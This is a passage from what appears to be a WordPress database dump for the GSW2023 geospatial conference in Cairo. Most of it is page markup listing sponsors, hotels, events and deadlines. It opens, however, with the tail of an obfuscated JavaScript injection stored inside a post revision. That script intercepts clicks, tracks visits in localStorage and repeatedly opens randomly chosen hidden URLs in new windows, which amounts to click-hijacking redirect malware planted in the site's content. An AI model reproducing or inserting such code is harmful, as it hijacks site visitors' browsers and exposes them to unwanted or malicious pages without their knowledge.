_0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-07-25 02:16:13','2023-07-25 02:16:13','',3066,'https://gsw2023.com/?p=5044',0,'revision','',0),
(5045,1,'2023-07-25 02:17:04','2023-07-25 02:17:04','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081933017{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081968974{margin-top: 95px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951146401{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951344645{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 size-full\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"160\" height=\"190\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1690251329195{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"www.funtrip-travel.com\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : gsw2023@funtrip-travel.com</p>\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687564731927{margin-top: 8px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" 